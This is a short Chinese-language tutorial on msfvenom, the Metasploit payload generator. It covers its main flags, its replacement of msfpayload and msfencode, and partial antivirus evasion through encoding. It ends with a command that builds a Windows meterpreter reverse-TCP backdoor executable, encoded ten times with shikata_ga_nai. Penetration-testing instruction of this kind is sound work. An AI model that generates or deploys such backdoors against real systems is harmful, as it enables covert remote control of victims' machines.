真正全部免杀是不会的,部分还是可以,主要是介绍msfvenom。
-----
现在依然还有很多教学视频、资料是使用之前的kali版本。随着更新有些命令是不适应最新的kali的。(也是掉过坑的人)
msfvenom集成了msfpayload和msfencode,2015年之后移除了后两项。再按照某些教程输后两个命令是不行的。
msfvenom重要参数:(可以使用msfvenom -h查看所有参数)
-p payload设置
-e 编码设置
-a 系统结构,默认x86
-s payload最大大小
-i 编码次数
-f 生成文件格式
另外几个命令:
平台查看: msfvenom --help-platforms
指定目标平台:--platform xxx
格式查看: msfvenom --help-formats
查看payload设置: msfvenom -p <payload name> --payload-options(可以发现该payload适合的平台等很多详细信息)
注意:如果要创建x64的负载需使用-a x64
正确生成后门文件:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -f exe >1.exe
参考文章:https://www.hackers-arise.com/single-post/2017/07/31/Metasploit-Basics-Part-9-Using-msfvenom-to-Create-Custom-Payloads